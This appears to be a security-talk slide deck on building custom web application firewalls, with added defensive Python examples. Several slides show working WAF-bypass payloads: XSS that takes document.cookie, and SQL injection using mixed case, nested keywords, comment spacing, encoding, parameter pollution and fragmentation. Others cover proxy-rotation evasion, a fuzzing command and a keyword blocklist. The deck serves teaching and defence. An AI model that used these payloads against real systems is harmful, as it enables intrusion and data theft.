Slide 1

Custom Web Application Firewall for the modern world

Slide 2

Whoami
● Antonio Costa aka Cooler_
● Projects: Github.com/CoolerVoid
● Contact: [email protected]
● Cyber security engineer
● Programmer/developer
● 13 years of work experience with pentest, code review, development, incident detection, incident response and hardening.

Slide 3

Simple case

Slide 4

Request: GET /sell/cars.php?search=<script>alert(document.cookie)</script>

Slide 5

Request rules
● Full match
● Blocklist
● Rank based
● Regex
● DFA
● AI
● ML

Slide 6

Other resources for rules
● Block per IP address
● Leak mitigation (responses)
● Insert anti-CSRF tokens
● Detect User-Agent anomalies
● Strong blocklist
● Denial of service
● Force hardening on custom endpoints: headers such as HSTS, anti-XSS, CSP, nosniff…
● Insert cookie attributes: HttpOnly, Secure...
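As an added example (not from the slides or from the author's WAF projects), a response-side filter a WAF can apply before relaying a backend answer: it drops headers that leak the server stack, appends HttpOnly and Secure to every Set-Cookie, and adds the hardening headers listed on this slide only when the application has not set them itself. The header values chosen here are assumptions; a real deployment sets a CSP that matches the application.

```python
# Headers to add when the application did not set them (values are assumptions).
SECURITY_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
}
# Headers that leak the stack to anyone fingerprinting the backend.
LEAKY_HEADERS = {"server", "x-powered-by", "x-aspnet-version"}
COOKIE_FLAGS = ("HttpOnly", "Secure")


def harden_cookie(value: str) -> str:
    """Append HttpOnly/Secure to a Set-Cookie value unless already present (any case)."""
    attrs = [part.strip() for part in value.split(";")]
    present = {attr.split("=", 1)[0].lower() for attr in attrs}
    for flag in COOKIE_FLAGS:
        if flag.lower() not in present:
            attrs.append(flag)
    return "; ".join(attrs)


def harden_response(headers):
    """headers: list of (name, value) pairs as a reverse proxy sees them; returns a new list."""
    out, present = [], set()
    for name, value in headers:
        lname = name.lower()
        if lname in LEAKY_HEADERS:
            continue  # leak mitigation: never forward server banners
        if lname == "set-cookie":
            value = harden_cookie(value)
        present.add(lname)
        out.append((name, value))
    for name, value in SECURITY_HEADERS.items():
        if name.lower() not in present:  # do not override what the app already set
            out.append((name, value))
    return out


if __name__ == "__main__":
    # Constructed sample of a backend response's headers.
    sample = [("Content-Type", "text/html"), ("Server", "Apache/2.4"),
              ("Set-Cookie", "PHPSESSID=abc123; Path=/")]
    for name, value in harden_response(sample):
        print(f"{name}: {value}")
```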

Slide 7

Practical point of view
● Detecting the type of WAF
● Common attacks against WAFs
● Custom attacks to bypass a WAF
● Attack mitigation in the WAF
● Attack mitigation in the application
● Create your custom WAF
● My open source projects
● Attack and protection!

Slide 8

Detection
You can search for a pattern in cookies, response headers… Each WAF leaves a different signature in its responses.
● https://svn.nmap.org/nmap/scripts/http-waf-detect.nse
● https://github.com/sandrogauci/wafw00f
● http://code.google.com/p/imperva-detect/

Slide 9

Common attacks
● WAFs can be configured to actively block requests and traffic that violate the WAF rule sets. This is a useful feature, but it needs to be used judiciously: a WAF in over-active blocking mode prevents legitimate traffic from reaching the web server, making the application unusable.
● Sometimes the rules are weak and do not match the attacks they are meant to block.

Slide 10

Mixed case
● A cool trick to bypass a common rule is mixed case; the whole point is to slip past rules that only match one letter case.
● SELECT, SeLect, selEcT… UnIOn, unIoN...
● Look at the following:
● /sell/cars.php?search=alert(document.cookie)
● /sell/cars.php?search=AlErt(DoCuMenT.cOoKie)

Slide 11

Replace keywords
● Keyword replacement is a common function in WAFs: this resource erases critical words from attacks, but it can be bypassed when you find a point to insert the blocked word inside the payload, so that a single pass removes the inner word and leaves the outer one intact.
● Look at the following:
● /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9
● /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9

Slide 12

Spaces to comments
● Replacing spaces with comments is a very good way to bypass a WAF.
● Look at the following:
● /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,database()-- -
● /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -

Slide 13

Encode abuse
● Another trick to bypass is encoding abuse; sometimes the application decodes and renders encoded strings...
● Look at the following: <script>alert(document.cookie)</script>
● URL encode: %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
● Base64 encode: PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=
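As an added example (not from the slides, RaptorWAF or OctopusWAF), the normalization step a WAF should run before matching rules, covering slides 10 to 13 at once: it URL-decodes until stable, turns comments into whitespace, squashes spaces and lower-cases, so the mixed-case, comment-spaced and URL-encoded requests above all reduce to the same plain form, and it contrasts single-pass keyword removal with removal to a fixed point. Base64 is deliberately not decoded, since blindly decoding every value produces false positives; the naive rule and blocklist are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote

# Blocklist of tokens taken from the "Application mitigations" slide.
BLOCKLIST = ("union", "select", "eval", "benchmark", "sleep", "version", "delete", "--")
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)


def naive_check(value: str) -> bool:
    """Case-sensitive, no decoding: the kind of rule the bypass slides defeat."""
    return any(tok in value for tok in ("UNION", "SELECT", "<script>"))


def normalize(value: str) -> str:
    """Canonical form for rule matching: decode, drop comments, squash spaces, lower-case."""
    prev = None
    while prev != value:  # repeat until stable, so double URL encoding is undone too
        prev, value = value, unquote(value)
    value = COMMENT_RE.sub(" ", value)  # UnIoN/*&a=*/SeLeCT -> "UnIoN SeLeCT"
    value = re.sub(r"[+\s]+", " ", value)  # '+' is a form-encoded space
    return value.lower()


def strip_keywords_once(value: str) -> str:
    """Single-pass removal as on the 'Replace keywords' slide: UNIunionON -> UNION."""
    for tok in ("union", "select"):
        value = re.sub(tok, "", value, flags=re.I)
    return value


def strip_keywords_fixpoint(value: str) -> str:
    """Repeat the removal until nothing changes, so a nested keyword cannot survive."""
    prev = None
    while prev != value:
        prev, value = value, strip_keywords_once(value)
    return value


def is_suspicious(value: str) -> bool:
    """Match the blocklist against the normalized value instead of the raw one."""
    norm = normalize(value)
    return "<script" in norm or any(tok in norm for tok in BLOCKLIST)
```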

Slide 14

Buffer overflow
● When the WAF service does not validate its inputs properly, you can find this problem in fuzzing tests...
● Look at the following:
● /cars/id/page/=-25+and+(select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7…
● id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...)+uNIoN+seLecT+2,3,version()...

Slide 15

HTTP Parameter Pollution (HPP)
The following request does not allow anyone to conduct an attack:
● /?id=1;select+4,5,6+from+users+where+id=1--
● This request will be performed successfully using HPP:
● /?id=1;select+4&id=5,6+from+users+where+id=1--
● Successfully conducting an HPP attack that bypasses a WAF depends on the environment of the application being attacked.

Slide 16

Using HTTP Parameter Fragmentation (HPF)
    execute_query("select * from table where a=".input_a." and b=".input_b);
    execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c);
● The following request does not allow anyone to conduct an attack:
● /?a=1+union+select+1,2/*
● These requests are a possible attack using HPF:
● /?a=1+union/*&b=*/select+1,2
● /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
● The SQL requests become:
    select * from table where a=1 union/* and b=*/select 1,2
    select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--
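Added example (not from the slides or the author's projects): a request-side check a WAF or the application can run on the raw query string to spot both tricks from the HPP and HPF slides. It parses the parameters preserving order and duplicates (a dict-style parser silently keeps only one value), flags names that repeat (HPP), and flags a comment that one parameter opens and a later parameter closes (HPF); the slides' own requests serve as the constructed inputs.

```python
from urllib.parse import parse_qsl


def parse_query(query: str):
    """Keep every occurrence in order; dict-style parsers silently drop duplicates."""
    return parse_qsl(query, keep_blank_values=True)


def duplicate_params(pairs):
    """Parameter names that appear more than once (HPP)."""
    seen, dups = set(), []
    for name, _ in pairs:
        if name in seen and name not in dups:
            dups.append(name)
        seen.add(name)
    return dups


def comment_edges(value: str):
    """Return (closes_unopened, leaves_open): the value starts inside a /* */ comment
    or ends inside one. Either means the comment spans a parameter boundary."""
    inside, closes_unopened, i = False, False, 0
    while i < len(value) - 1:
        pair = value[i:i + 2]
        if pair == "/*" and not inside:
            inside, i = True, i + 2
        elif pair == "*/":
            closes_unopened |= not inside
            inside, i = False, i + 2
        else:
            i += 1
    return closes_unopened, inside


def fragmented_comment(pairs) -> bool:
    """HPF: one parameter opens a comment and a later parameter closes it."""
    open_seen = False
    for _, value in pairs:
        closes, leaves_open = comment_edges(value)
        if closes and open_seen:
            return True
        open_seen = open_seen or leaves_open
    return False


def analyze(query: str) -> dict:
    """Summary a rule engine can score: repeated names and cross-parameter comments."""
    pairs = parse_query(query)
    return {"duplicates": duplicate_params(pairs), "fragmented": fragmented_comment(pairs)}
```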

Slide 17

Time machine
● Random delay for each request
● Random User-Agent per request
● Random IP address per request (proxy)
● Bypass intrusion prevention systems (IPS) and web application firewalls (WAF)

Slide 18

Automate
● A project to transform your list of payloads with many techniques that help bypass a WAF.
● https://github.com/CoolerVoid/payloadmask

Slide 19

Fuzzing / Brute
● 0d1n is a tool for automating customized attacks against web applications.
● Open source
● Uses a thread pool
● Github.com/CoolerVoid/0d1n

Slide 20

Fuzzing / Brute

Slide 21

Fuzzing / Brute
    0d1n --host http://localhost/test.php --post "car_name_search=^" --payloads payloads/xss.txt --find_regex_list payloads/guess.txt --log name_log --save_response --tamper urlencode -proxy-rand payloads/proxy.txt

Slide 22

Fuzzing / Brute

Slide 23

Application mitigations
● Validation and proper sanitization (remove DOM, JS, HTML…).
● Prepared statements (with parameterized queries).
● Create a function that checks a blocklist of common words used in attacks (eval, timeout, union, --, select, delete, version, benchmark, sleep, /**/...); set the whole string to lower case before scanning for patterns.
● Study your ORM (SQLAlchemy, Hibernate...) to prevent pitfalls in its features.
● Follow MITRE and OWASP hardening guidance, etc...
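As an added example (not the slides' code), the execute_query() call from the HPF slide written both ways in Python against a small SQLite table constructed here: the concatenating form the slide shows, and the prepared-statement form this slide recommends. The table name and rows are assumptions; the fragmented input from the HPF slide is fed to both so the difference is visible.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the slide's 'table' with columns a and b."""
    con = sqlite3.connect(":memory:")
    con.execute("create table cars(a integer, b text)")
    con.executemany("insert into cars values (?, ?)", [(1, "sedan"), (2, "truck")])
    return con


def query_concat(con: sqlite3.Connection, input_a: str, input_b: str):
    """The slide's execute_query(): user input spliced into the SQL text.
    Comments and UNION inside the values become part of the statement."""
    sql = "select * from cars where a=" + input_a + " and b=" + input_b
    return con.execute(sql).fetchall()


def query_prepared(con: sqlite3.Connection, input_a, input_b):
    """Prepared statement: the SQL text is fixed and the values travel separately,
    so '1 union/*' is only a string the column is compared against."""
    return con.execute("select * from cars where a=? and b=?", (input_a, input_b)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", query_concat(db, "1 union/*", "*/select 1,2"))
    print("prepared:    ", query_prepared(db, "1 union/*", "*/select 1,2"))
    print("legit lookup:", query_prepared(db, 1, "sedan"))
```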

Slide 24

Create your WAF

Slide 25

Create your WAF
● Five years of study around sockets and raw sockets
● Demultiplexer problems (select(), epoll(), kqueue(), pthreads, MPI…)
● Race conditions
● Testing a long list of libraries: libuv (used by Node), libevent (old lib for the core of nginx), Python Twisted

Slide 26

Create your WAF
● WAF from scratch: RaptorWAF
● Demultiplexer uses select() with pthreads
● Has a problem: race conditions at millions of connections (locking with a mutex cannot save it).
● Easy to understand
● Github.com/CoolerVoid/RaptorWAF

Slide 27

Create your WAF
● Pthread tests
● Libevent study
● Lighttpd core study
● The big journey...

Slide 28

Create your WAF
● OctopusWAF
● Uses libevent
● Supports heavy connection loads
● Uses libinjection to detect SQLi
● Github.com/CoolerVoid/OctopusWAF

Slide 29

Create your WAF

Slide 30

Detections

Slide 31

Detections
● Machine learning
● Natural language
● AI
● Score based
● Uploads (binary checks)

Slide 32

Questions ?

Slide 33

Thank you
Contact: [email protected]